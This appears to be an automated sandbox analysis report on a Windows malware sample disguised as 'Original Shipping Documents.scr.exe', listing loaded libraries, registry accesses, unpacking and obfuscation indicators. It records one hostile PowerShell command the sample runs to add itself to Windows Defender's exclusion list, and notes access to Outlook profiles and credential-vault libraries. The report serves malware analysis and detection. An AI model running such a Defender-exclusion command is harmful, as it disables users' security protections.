Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: atl.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: msisip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wshext.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: appxsip.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: opcservices.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: microsoft.management.infrastructure.native.unmanaged.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wmidcom.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: dwrite.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: windowscodecs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: fastprox.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: ncobjapi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mpclient.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: wmitomi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: mi.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: miutils.dll	Jump to behavior
Source: C:\Windows\System32\wbem\WmiPrvSE.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: taskschd.dll	Jump to behavior
Source: C:\Windows\SysWOW64\schtasks.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: scecli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: wininet.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: uxtheme.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: ieframe.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: iertutil.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: netapi32.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: version.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: userenv.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: wkscli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: netutils.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: sspicli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: windows.storage.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: profapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: secur32.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: mlang.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: propsys.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: winsqlite3.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: vaultcli.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: wintypes.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: dpapi.dll
Source: C:\Windows\SysWOW64\SecEdit.exe	Section loaded: cryptbase.dll
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Section loaded: wininet.dll
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Section loaded: mswsock.dll
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Section loaded: dnsapi.dll
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Section loaded: iphlpapi.dll
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Section loaded: fwpuclnt.dll
Source: C:\Program Files (x86)\fgJkuavujWhdydWUgAnvsfqKzPnxpZWUEwvbYqNLcUuK\xBk0IlKjg.exe	Section loaded: rasadhlp.dll

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32

Jump to behavior

Source: Window Recorder

Window detected: More than 3 window changes detected

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Windows\SysWOW64\SecEdit.exe

Key opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\

Source: Original Shipping Documents.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: Original Shipping Documents.scr.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: Original Shipping Documents.scr.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: SecEdit.pdb source: Original Shipping Documents.scr.exe, 00000008.00000002.1741994583.0000000001768000.00000004.00000020.00020000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849359280.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: SecEdit.pdbGCTL source: Original Shipping Documents.scr.exe, 00000008.00000002.1741994583.0000000001768000.00000004.00000020.00020000.00000000.sdmp, xBk0IlKjg.exe, 0000000F.00000002.3849359280.0000000000C5E000.00000004.00000020.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdbUGP source: Original Shipping Documents.scr.exe, 00000008.00000002.1743279814.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1741743139.0000000002829000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1744475115.0000000002B10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: wntdll.pdb source: Original Shipping Documents.scr.exe, Original Shipping Documents.scr.exe, 00000008.00000002.1743279814.0000000001A10000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1741743139.0000000002829000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002CC0000.00000040.00001000.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000003.1744475115.0000000002B10000.00000004.00000020.00020000.00000000.sdmp, SecEdit.exe, 00000010.00000002.3850619845.0000000002E5E000.00000040.00001000.00020000.00000000.sdmp
Source:	Binary string: dfxE.pdb source: Original Shipping Documents.scr.exe, xHOAJKcJeCXuc.exe.0.dr
Source:	Binary string: dfxE.pdbSHA256c source: Original Shipping Documents.scr.exe, xHOAJKcJeCXuc.exe.0.dr
Source:	Binary string: C:\Work\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: xBk0IlKjg.exe, 0000000F.00000000.1666851745.0000000000F1F000.00000002.00000001.01000000.0000000B.sdmp, xBk0IlKjg.exe, 00000011.00000000.1812032657.0000000000F1F000.00000002.00000001.01000000.0000000B.sdmp

Data Obfuscation

.NET source code contains potential unpacker

Source: Original Shipping Documents.scr.exe, frm_Login.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: xHOAJKcJeCXuc.exe.0.dr, frm_Login.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, q4RPYX9Q3GcYEGPgYY.cs	.Net Code: iQmYTfXRWl System.Reflection.Assembly.Load(byte[])
Source: 0.2.Original Shipping Documents.scr.exe.7d30000.2.raw.unpack, MainForm.cs	.Net Code: _200F_206B_206F_200F_206D_206E_202A_200F_200C_202A_200F_206E_206A_206D_200C_202A_206D_200E_206B_200C_202A_202C_206A_202B_206B_206C_206E_206A_202B_206A_200E_202A_206C_202D_206C_200E_202E_206E_202D_200E_202E System.Reflection.Assembly.Load(byte[])
Source: 16.2.SecEdit.exe.32ecd14.2.raw.unpack, frm_Login.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 17.0.xBk0IlKjg.exe.2dacd14.1.raw.unpack, frm_Login.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 17.2.xBk0IlKjg.exe.2dacd14.1.raw.unpack, frm_Login.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])
Source: 20.2.firefox.exe.3abcd14.0.raw.unpack, frm_Login.cs	.Net Code: InitializeComponent System.AppDomain.Load(byte[])

Suspicious powershell command line found

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Original Shipping Documents.scr.exe"			Jump to behavior

Uses code obfuscation techniques (call, push, ret)

Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 0_2_0547E5C0 push eax; retf	0_2_0547E5C1
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004148AC push ds; iretd	8_2_00414975
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004020CA push 00000042h; retf	8_2_004020CC
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004148A3 push esp; retf	8_2_004148A4
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0041490E push ds; iretd	8_2_00414975
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00416123 pushad ; retn D6B9h	8_2_004161DB
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004051A8 push edi; ret	8_2_004051D7
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_004073DF push eax; ret	8_2_004073E0
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_00403400 push eax; ret	8_2_00403402
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0040AD1E push ss; ret	8_2_0040AD20
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_0040858B push cs; ret	8_2_004085C2
Source: C:\Users\user\Desktop\Original Shipping Documents.scr.exe	Code function: 8_2_01A409AD push ecx; mov dword ptr [esp], ecx	8_2_01A409B6
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 9_2_0126E5C0 push eax; retf	9_2_0126E5C1
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0117C54F push 8B011067h; ret	13_2_0117C554
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0117C54D pushfd ; ret	13_2_0117C54E
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_011309AD push ecx; mov dword ptr [esp], ecx	13_2_011309B6
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0117C9D7 push edi; ret	13_2_0117C9D9
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_0110135E push eax; iretd	13_2_01101369
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01101FEC push eax; iretd	13_2_01101FED
Source: C:\Users\user\AppData\Roaming\xHOAJKcJeCXuc.exe	Code function: 13_2_01187E99 push ecx; ret	13_2_01187EAC

Source: Original Shipping Documents.scr.exe	Static PE information: section name: .text entropy: 7.748600107096591
Source: xHOAJKcJeCXuc.exe.0.dr	Static PE information: section name: .text entropy: 7.748600107096591

Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, u70LQb3FBOcAsRPNHk.cs	High entropy of concatenated method names: 'Dispose', 'zk20HXXfyg', 'lujO2xdHWI', 'RG4K6VojW3', 'IPW0kBI8AI', 'Jd30zaubKF', 'ProcessDialogKey', 'P47O1T4sOs', 'pCmO0EbVoK', 'yN5OOTWHF3'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, xiZUgb0YtRinv3UjqPu.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jwpKUf2ncd', 'W7aKQ8KDa1', 'Y0LKrn9PNV', 'fe1KKKrNjT', 'CAwKXWvJqq', 'IcRKcFg3yb', 'Ix2KjQvdiZ'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, OAVAaTg7HwwANjOZWN.cs	High entropy of concatenated method names: 'zwq7BaLRSk', 'Ah678G9gTR', 'BmT7TWCjQk', 'QMQ75phRgd', 'EHT7DhtqdA', 'd1M7IeppJw', 'Bc57lFbkNR', 'GXY7e6koLs', 'tye7uWny5A', 'roU7VRxdDV'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, DB6oMTFMpsnIShblX3.cs	High entropy of concatenated method names: 'OpF7siO4Qq', 'CxF7NpeWle', 'Egr7wbM4fb', 'VIqwk4v2Sp', 'sacwzWf7Nl', 'N7C7180SRH', 'bde70GLM1n', 'MTH7OBmJhD', 'ja47iFUp1Y', 'jLa7Y4VDua'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, q4RPYX9Q3GcYEGPgYY.cs	High entropy of concatenated method names: 'Sjxip3o46x', 'm6Dist1t6c', 'KEJi36wHu4', 'de2iN1CMCt', 'csYiCBt23a', 'ecUiwawDd6', 'W15i7pnHjy', 'h7ri9kFkBw', 'xS2ih0ux5h', 'z4ciyiERxa'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, oreZmI015Z308tDmyWP.cs	High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'HuPQoUQmC3', 'vFXQ41PcKg', 'y7wQdscH5K', 'D41QZj0atM', 'QFKQP1nL3X', 'v2nQn2KFJZ', 'R1pQqvLSVH'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, xDKT71OAvQISnCHaga.cs	High entropy of concatenated method names: 'wqETKidVe', 'p1H5wjSyR', 'hGxIsKpaU', 'sRHldnP4i', 'wu0uXdbtU', 'sUaVDoM0Q', 'vfbpEGfAlWkiB6Um2d', 'lftwKMRvt2Y4k7Klqr', 'iMBEMiYQp', 'i0tQctNtY'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, jT4sOsHWCmEbVoK8N5.cs	High entropy of concatenated method names: 'U3dUtbbSa6', 'nWZU2rB3dS', 'QhlUvJ5BBj', 'XkcULTWDx1', 'HxoUSM76vD', 'kGIUfjfslE', 'jbUUFRPYIE', 'NidUMuRTUq', 'TedUgTvs7q', 'IQlUm4Syhe'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, Vw3nT2nhyYdW7CTvPY.cs	High entropy of concatenated method names: 'ToString', 'QMCWotELj9', 'OthW2Xfv0l', 'z6EWvE2qDk', 'hclWL0bfT9', 'BJhWSubxnu', 'VNeWfEnImV', 'YkOWFvZLhV', 'OudWMqpVkM', 'rDXWgUysXP'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, z4ZVD7zCqlU1ats5Kk.cs	High entropy of concatenated method names: 'jpmQIXnrQp', 'VhZQeuHagU', 'fqkQumvj5a', 'qjxQtTHyDZ', 'K8uQ2aD2XQ', 'QcmQLb90aZ', 'PntQSPSrdt', 'HSZQjfj0DQ', 'wd6QBi53gj', 'PGcQ8rv1Ar'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, PsHuQfZqWhwBIk6cSG.cs	High entropy of concatenated method names: 'd9Aam19Tu7', 'plka47iMaJ', 'LyMaZ7UIXx', 'i4BaPJRj7m', 'fpQa2FarJv', 'qatavA3ri8', 'fGiaLYm9eR', 'UE6aShNUe4', 'YkUafB6imB', 'KRmaFV0Sip'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, yBCaXouy5eETR84Xs2.cs	High entropy of concatenated method names: 'nWIN5qgq0q', 'a9wNIUgZxW', 'PQGNe2dL83', 'z5LNu1UkPy', 'fjhNap0XQe', 'spnNW2KIMT', 'YRaNR4vFpk', 'UmLNETetKI', 'XRgNUtGPsM', 'RBJNQFfGI5'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, S0jgB4009bU263QHpIL.cs	High entropy of concatenated method names: 'v0XQk7CflK', 'snsQzEGxC7', 'Chmr1ea3qy', 'x2Nr0ve1kG', 'Y24rOZENm0', 'CRxriy9j7j', 'qGRrYZ8wvp', 'mw9rpW2k7o', 'lDLrshdrL5', 'UbJr32aJhH'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, X6FfvbYiXsq3qC6MfI.cs	High entropy of concatenated method names: 'cxP07ub6rx', 'vyn09uOkRK', 'Oy50yeETR8', 'PXs0b2PZYb', 'txx0axGkjL', 'RTI0WH5Bmj', 'gDQ2P5pFt9gneIkXYo', 'V11SgAE5O4tEEdEouG', 'bok002dCII', 'YoF0iLivQJ'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, MKHckiGbnbdbS8HRcy.cs	High entropy of concatenated method names: 'AyZRJORdP8', 'YtGRkMEMEr', 'z6TE1ebBlA', 'R86E0eO5VL', 'ilORoL04dT', 'SKoR4CW98x', 'EYpRdccTGw', 'HC1RZYt4f2', 'xdBRPwQGvh', 'CpRRnobVPn'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, YjLPTItH5BmjjlXbDS.cs	High entropy of concatenated method names: 'KQOwpxepFE', 'wlZw324bgv', 'IsCwC0sGKI', 'ji7w7qKvMx', 'ssbw9qD2Qw', 'oobC6vMmgy', 'NIDCGGT7ev', 'ehACxjOWWk', 'aLnCJkDCg2', 'YSVCHJ0rDv'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, RZYbYtV9JyyAirxxxG.cs	High entropy of concatenated method names: 'wgdCDCXkop', 'qwQClS1aTw', 'gMkNvDjVtm', 'rc2NL2utuK', 'MJeNSWUxiL', 'RL8NfrZomD', 'CoyNF4UjrI', 'w8kNMl0ieM', 'hESNgt6niw', 'DAeNmBD0Tq'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, VJVcxPfJbmowbbVQGB.cs	High entropy of concatenated method names: 'BMmwnUnv4o', 'uPwwqAWfsT', 'gh0w6N34Ql', 'ToString', 'EEMwGEk2d7', 'F8RwxHijub', 'F7vlLoTmj8WD3spf87Z', 'ncBc96TIFxwxhZeopFt', 'PHyy6wTnCAU5YLEC87f', 'bwwCoKTMdPms40PFuJy'
Source: 0.2.Original Shipping Documents.scr.exe.9960000.3.raw.unpack, zWHF3JkqnhIH1cVBpy.cs	High entropy of concatenated method names: 'AUiQN0Que0', 'PI3QC5uCs2', 'P1eQwHSDGj', 'h8tQ7Tgav5', 'TkmQU5Za7D', 'tHWQ9kORmy', 'Next', 'Next', 'Next', 'NextBytes'
